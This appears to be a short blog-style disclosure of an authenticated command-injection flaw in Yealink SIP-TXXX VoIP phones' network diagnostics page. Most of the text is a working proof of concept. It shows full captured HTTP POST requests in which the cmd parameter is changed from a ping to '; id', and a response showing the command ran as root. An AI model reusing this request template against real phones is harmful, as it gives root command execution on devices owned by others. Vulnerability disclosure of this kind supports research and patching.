Do you love hacking Phones? well of course VOIP phones , this should be worth a read!
Just unconvered a vulnerability that existed in Yealink SIP-TXXX, This vulnerability leads to RCE , but it's Authenticated meaning you must be logged in to the web interface!
After logging in to the web interface which by any chance can be port 80 or port 443 , there is a Network
tab clicking on it , there are 5 sections Basic
,PC Port
,NAT
,Advanced
,and Diagnostics
, Clicking on Diagnostics
:
and there we can ping
or perform traceroute
command upon an IP address , capturing that request with burpsuite will reveal how the whole thing should look and how the parameters are sent with their values;
POST /servlet?m=mod_data&p=network-diagnosis&q=docmd&Rajax=0.890925468511929 HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Length: 49
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: http://xxx.xxx.xxx.xxx
Referer: http://xxx.xxx.xxx.xxx/servlet?m=mod_data&p=network-diagnosis&q=load
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: JSESSIONID=9a83d24461329a130
Connection: close
cmd=start ping 127.0.0.1&token=1714636915c6acea98
so the parameter cmd
takes the value start
then the command to execute ping 127.0.0.1
, so I thought of it as an easy win , where as I changed the value of the parameter cmd
to take another value to execute instead of ping
by an easy basic linux command:
cmd=; id;&token=1714636915c6acea98
and now it will execute id
command instead!
POST REQUEST
POST /servlet?m=mod_data&p=network-diagnosis&q=docmd&Rajax=0.6597899560162612 HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Length: 33
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: http://xxx.xxx.xxx.xxx
Referer: http://xxx.xxx.xxx.xxx/servlet?m=mod_data&p=network-diagnosis&q=load
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: JSESSIONID=9a83d2446809c4f88
Connection: close
cmd=; id&token=1957747793cee22738
RESPONSE
HTTP/1.1 200 OK
Content-Type: text/html
Connection: close
Date: Wed, 10 Nov 2021 14:20:23 GMT
Server: embed httpd
Content-Length: 82
<html>
<body>
<div id="_RES_INFO_">
uid=0(root) gid=0(root)
</div>
</body>
</html>
And there we have RCE! :100:
Contact : Twitter: tahaafarooq, Telegram : tahaafarooq